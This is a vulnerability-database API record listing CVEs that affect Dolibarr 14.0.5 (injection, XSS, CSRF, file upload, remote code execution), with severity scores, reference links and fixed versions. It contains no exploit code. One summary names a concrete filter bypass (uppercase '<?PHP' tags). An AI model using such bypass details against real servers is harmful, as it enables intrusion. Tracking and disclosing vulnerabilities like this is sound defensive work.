Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:composer/dolibarr/dolibarr@14.0.5
Typecomposer
Namespacedolibarr
Namedolibarr
Version14.0.5
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
0
url VCID-1225-a2a6-bkan
vulnerability_id VCID-1225-a2a6-bkan
summary 
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Cross Site Scripting vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/
url http://dolibarr.com
1
reference_url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/
url https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38888_Dolibarr_XSS.pdf
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-38888
reference_id
reference_type
scores
0
value 0.05006
scoring_system epss
scoring_elements 0.89903
published_at 2026-06-07T12:55:00Z
1
value 0.05006
scoring_system epss
scoring_elements 0.89906
published_at 2026-06-05T12:55:00Z
2
value 0.05006
scoring_system epss
scoring_elements 0.89907
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-38888
3
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-38888
reference_id CVE-2023-38888
reference_type
scores
0
value 9.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-38888
5
reference_url https://github.com/advisories/GHSA-62wf-h26v-5m57
reference_id GHSA-62wf-h26v-5m57
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-62wf-h26v-5m57
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@17.0.1
purl pkg:composer/dolibarr/dolibarr@17.0.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1
aliases CVE-2023-38888, GHSA-62wf-h26v-5m57
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1225-a2a6-bkan
1
url VCID-1uje-n8xc-y7b7
vulnerability_id VCID-1uje-n8xc-y7b7
summary 
Dolibarr vulnerable to remote code execution via uppercase manipulation
Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-30253
reference_id
reference_type
scores
0
value 0.89175
scoring_system epss
scoring_elements 0.99553
published_at 2026-06-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-30253
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/
url https://github.com/Dolibarr/dolibarr
2
reference_url https://www.swascan.com/blog
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.swascan.com/blog
3
reference_url https://www.swascan.com/security-advisory-dolibarr-17-0-0
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.swascan.com/security-advisory-dolibarr-17-0-0
4
reference_url https://www.swascan.com/blog/
reference_id blog
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/
url https://www.swascan.com/blog/
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-30253
reference_id CVE-2023-30253
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-30253
6
reference_url https://github.com/advisories/GHSA-9wqr-5jp4-mjmh
reference_id GHSA-9wqr-5jp4-mjmh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9wqr-5jp4-mjmh
7
reference_url https://www.swascan.com/security-advisory-dolibarr-17-0-0/
reference_id security-advisory-dolibarr-17-0-0
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/
url https://www.swascan.com/security-advisory-dolibarr-17-0-0/
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@17.0.1
purl pkg:composer/dolibarr/dolibarr@17.0.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1
aliases CVE-2023-30253, GHSA-9wqr-5jp4-mjmh
risk_score 10.0
exploitability 2.0
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1uje-n8xc-y7b7
2
url VCID-3cg6-pnf4-jkc1
vulnerability_id VCID-3cg6-pnf4-jkc1
summary Business Logic Errors in Packagist dolibarr/dolibarr
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0414
reference_id
reference_type
scores
0
value 0.00326
scoring_system epss
scoring_elements 0.55861
published_at 2026-06-04T12:55:00Z
1
value 0.00326
scoring_system epss
scoring_elements 0.5591
published_at 2026-06-07T12:55:00Z
2
value 0.00326
scoring_system epss
scoring_elements 0.55923
published_at 2026-06-06T12:55:00Z
3
value 0.00326
scoring_system epss
scoring_elements 0.55917
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0414
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684
3
reference_url https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0414
reference_id CVE-2022-0414
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0414
5
reference_url https://github.com/advisories/GHSA-f768-8pvq-mm6r
reference_id GHSA-f768-8pvq-mm6r
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f768-8pvq-mm6r
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@15.0.0
purl pkg:composer/dolibarr/dolibarr@15.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1225-a2a6-bkan
1
vulnerability VCID-1uje-n8xc-y7b7
2
vulnerability VCID-3xdg-az5a-dyft
3
vulnerability VCID-4c2v-phxx-y3h8
4
vulnerability VCID-6drz-jsq4-wyhd
5
vulnerability VCID-7ku4-fwqc-33ba
6
vulnerability VCID-7qjh-teat-tqav
7
vulnerability VCID-8fjr-6hdm-vqdd
8
vulnerability VCID-d4uk-4adf-mba9
9
vulnerability VCID-egxz-r3nw-xffm
10
vulnerability VCID-ewrf-wdsh-kqgs
11
vulnerability VCID-f122-u34a-kfcm
12
vulnerability VCID-htgn-37m4-c7fu
13
vulnerability VCID-j345-dk2c-yfds
14
vulnerability VCID-jbkd-su9m-3udy
15
vulnerability VCID-k9nc-tze6-k7bx
16
vulnerability VCID-mpmz-eh21-nkcm
17
vulnerability VCID-pfyf-s4fc-d3a8
18
vulnerability VCID-rqux-jkta-4kfj
19
vulnerability VCID-s3xn-47cy-eucf
20
vulnerability VCID-srth-2stq-gyaq
21
vulnerability VCID-tmv2-39y8-f7f1
22
vulnerability VCID-tsbf-m4eq-gbgp
23
vulnerability VCID-vp4z-qpc7-uug1
24
vulnerability VCID-vwxd-syyk-jueh
25
vulnerability VCID-w7ww-nq62-e7b1
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0
1
url pkg:composer/dolibarr/dolibarr@16.0.0
purl pkg:composer/dolibarr/dolibarr@16.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-49k5-kwjc-z3hd
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0
aliases CVE-2022-0414, GHSA-f768-8pvq-mm6r
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3cg6-pnf4-jkc1
3
url VCID-3xdg-az5a-dyft
vulnerability_id VCID-3xdg-az5a-dyft
summary 
Reflected Cross-Site Scripting (XSS) in Dolibarr
A Reflected Cross-site scripting (XSS) vulnerability located in htdocs/compta/paiement/card.php of Dolibarr before 19.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the facid parameter.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-34051
reference_id
reference_type
scores
0
value 0.00966
scoring_system epss
scoring_elements 0.76942
published_at 2026-06-05T12:55:00Z
1
value 0.00966
scoring_system epss
scoring_elements 0.76939
published_at 2026-06-07T12:55:00Z
2
value 0.00966
scoring_system epss
scoring_elements 0.76951
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-34051
1
reference_url https://blog.smarttecs.com/posts/2024-004-cve-2024-34051
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://blog.smarttecs.com/posts/2024-004-cve-2024-34051
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/commit/3a3ccc253b8eceddee84f158b2c262a4033b9402
4
reference_url https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/
reference_id 2024-004-cve-2024-34051
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-20T15:43:14Z/
url https://blog.smarttecs.com/posts/2024-004-cve-2024-34051/
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-34051
reference_id CVE-2024-34051
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-34051
6
reference_url https://github.com/advisories/GHSA-hv2j-6654-x74q
reference_id GHSA-hv2j-6654-x74q
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hv2j-6654-x74q
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@19.0.2
purl pkg:composer/dolibarr/dolibarr@19.0.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2
aliases CVE-2024-34051, GHSA-hv2j-6654-x74q
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3xdg-az5a-dyft
4
url VCID-4c2v-phxx-y3h8
vulnerability_id VCID-4c2v-phxx-y3h8
summary 
Dolibarr vulnerable to Cross-Site Request Forgery
Incorrect access control in Dolibarr ERP CRM versions 19.0.0 and before, allows authenticated attackers to steal victim users' session cookies and CSRF protection tokens via user interaction with a crafted web page, leading to account takeover.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-31503
reference_id
reference_type
scores
0
value 0.00057
scoring_system epss
scoring_elements 0.18126
published_at 2026-06-07T12:55:00Z
1
value 0.00057
scoring_system epss
scoring_elements 0.18164
published_at 2026-06-06T12:55:00Z
2
value 0.00057
scoring_system epss
scoring_elements 0.18162
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-31503
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-31503
reference_id CVE-2024-31503
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-31503
3
reference_url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-31503.md
reference_id CVE-2024-31503.MD
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-08-19T20:05:15Z/
url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-31503.md
4
reference_url https://github.com/advisories/GHSA-6ppg-rgrg-f573
reference_id GHSA-6ppg-rgrg-f573
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6ppg-rgrg-f573
fixed_packages
aliases CVE-2024-31503, GHSA-6ppg-rgrg-f573
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4c2v-phxx-y3h8
5
url VCID-6drz-jsq4-wyhd
vulnerability_id VCID-6drz-jsq4-wyhd
summary 
Dolibarr arbitrary file upload vulnerability
An arbitrary file upload vulnerability in the Upload Template function of Dolibarr ERP CRM up to v19.0.1 allows attackers to execute arbitrary code via uploading a crafted .SQL file.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/
url http://dolibarr.com
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-37821
reference_id
reference_type
scores
0
value 0.00234
scoring_system epss
scoring_elements 0.46422
published_at 2026-06-07T12:55:00Z
1
value 0.00234
scoring_system epss
scoring_elements 0.46441
published_at 2026-06-05T12:55:00Z
2
value 0.00234
scoring_system epss
scoring_elements 0.46442
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-37821
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-37821
reference_id CVE-2024-37821
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-37821
4
reference_url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-37821.md
reference_id CVE-2024-37821.MD
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/
url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-37821.md
5
reference_url https://github.com/advisories/GHSA-p7r8-7w87-8g46
reference_id GHSA-p7r8-7w87-8g46
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p7r8-7w87-8g46
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@19.0.2
purl pkg:composer/dolibarr/dolibarr@19.0.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2
aliases CVE-2024-37821, GHSA-p7r8-7w87-8g46
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6drz-jsq4-wyhd
6
url VCID-7ku4-fwqc-33ba
vulnerability_id VCID-7ku4-fwqc-33ba
summary 
Dolibarr vulnerable to RCE via the computed field parameter
Dolibarr ERP & CRM v21.0.1 were discovered to contain a remote code execution (RCE) vulnerability in the User module configuration via the computed field parameter.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/
url http://dolibarr.com
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-56588
reference_id
reference_type
scores
0
value 0.00218
scoring_system epss
scoring_elements 0.44428
published_at 2026-06-05T12:55:00Z
1
value 0.00239
scoring_system epss
scoring_elements 0.4719
published_at 2026-06-06T12:55:00Z
2
value 0.00239
scoring_system epss
scoring_elements 0.47172
published_at 2026-06-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-56588
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://github.com/Dolibarr/dolibarr/commit/b03f30c7e27fb89dbfb15902dbf4619ae77f0f86
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr/commit/b03f30c7e27fb89dbfb15902dbf4619ae77f0f86
4
reference_url https://github.com/PhDg1410/Research
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-10-01T20:04:37Z/
url https://github.com/PhDg1410/Research
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-56588
reference_id CVE-2025-56588
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-56588
6
reference_url https://github.com/advisories/GHSA-27hj-48r9-x2vx
reference_id GHSA-27hj-48r9-x2vx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-27hj-48r9-x2vx
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@21.0.3
purl pkg:composer/dolibarr/dolibarr@21.0.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@21.0.3
aliases CVE-2025-56588, GHSA-27hj-48r9-x2vx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7ku4-fwqc-33ba
7
url VCID-7qjh-teat-tqav
vulnerability_id VCID-7qjh-teat-tqav
summary 
Code injection in dolibarr/dolibarr
Code Injection in GitHub repository dolibarr/dolibarr prior to 15.0.1.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0819
reference_id
reference_type
scores
0
value 0.01735
scoring_system epss
scoring_elements 0.82813
published_at 2026-06-04T12:55:00Z
1
value 0.01735
scoring_system epss
scoring_elements 0.82835
published_at 2026-06-07T12:55:00Z
2
value 0.01735
scoring_system epss
scoring_elements 0.82838
published_at 2026-06-06T12:55:00Z
3
value 0.01735
scoring_system epss
scoring_elements 0.82839
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0819
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/2a48dd349e7de0d4a38e448b0d2ecbe25e968075
3
reference_url https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/b03d4415-d4f9-48c8-9ae2-d3aa248027b5
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0819
reference_id CVE-2022-0819
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0819
5
reference_url https://github.com/advisories/GHSA-42qm-c3cf-9wv2
reference_id GHSA-42qm-c3cf-9wv2
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-42qm-c3cf-9wv2
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@15.0.1
purl pkg:composer/dolibarr/dolibarr@15.0.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1225-a2a6-bkan
1
vulnerability VCID-1uje-n8xc-y7b7
2
vulnerability VCID-3xdg-az5a-dyft
3
vulnerability VCID-4c2v-phxx-y3h8
4
vulnerability VCID-6drz-jsq4-wyhd
5
vulnerability VCID-7ku4-fwqc-33ba
6
vulnerability VCID-8fjr-6hdm-vqdd
7
vulnerability VCID-d4uk-4adf-mba9
8
vulnerability VCID-ewrf-wdsh-kqgs
9
vulnerability VCID-f122-u34a-kfcm
10
vulnerability VCID-htgn-37m4-c7fu
11
vulnerability VCID-j345-dk2c-yfds
12
vulnerability VCID-jbkd-su9m-3udy
13
vulnerability VCID-k9nc-tze6-k7bx
14
vulnerability VCID-mpmz-eh21-nkcm
15
vulnerability VCID-pfyf-s4fc-d3a8
16
vulnerability VCID-s3xn-47cy-eucf
17
vulnerability VCID-srth-2stq-gyaq
18
vulnerability VCID-tmv2-39y8-f7f1
19
vulnerability VCID-tsbf-m4eq-gbgp
20
vulnerability VCID-vp4z-qpc7-uug1
21
vulnerability VCID-vwxd-syyk-jueh
22
vulnerability VCID-w7ww-nq62-e7b1
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.1
aliases CVE-2022-0819, GHSA-42qm-c3cf-9wv2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7qjh-teat-tqav
8
url VCID-8fjr-6hdm-vqdd
vulnerability_id VCID-8fjr-6hdm-vqdd
summary 
Dolibarr user with permission to edit PHP content can bypass filtering to restrict dangerous PHP functions
In the Website module of Dolibarr ERP & CRM 22.0.4 and below, the application uses blacklist-based filtering to restrict dangerous PHP functions related to system command execution. An authenticated user with permission to edit PHP content can bypass this filtering, resulting in full remote code execution with the ability to execute arbitrary operating system commands on the server.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/
url http://dolibarr.com
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-31019
reference_id
reference_type
scores
0
value 0.00119
scoring_system epss
scoring_elements 0.30504
published_at 2026-06-05T12:55:00Z
1
value 0.00119
scoring_system epss
scoring_elements 0.30441
published_at 2026-06-07T12:55:00Z
2
value 0.00119
scoring_system epss
scoring_elements 0.30471
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-31019
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
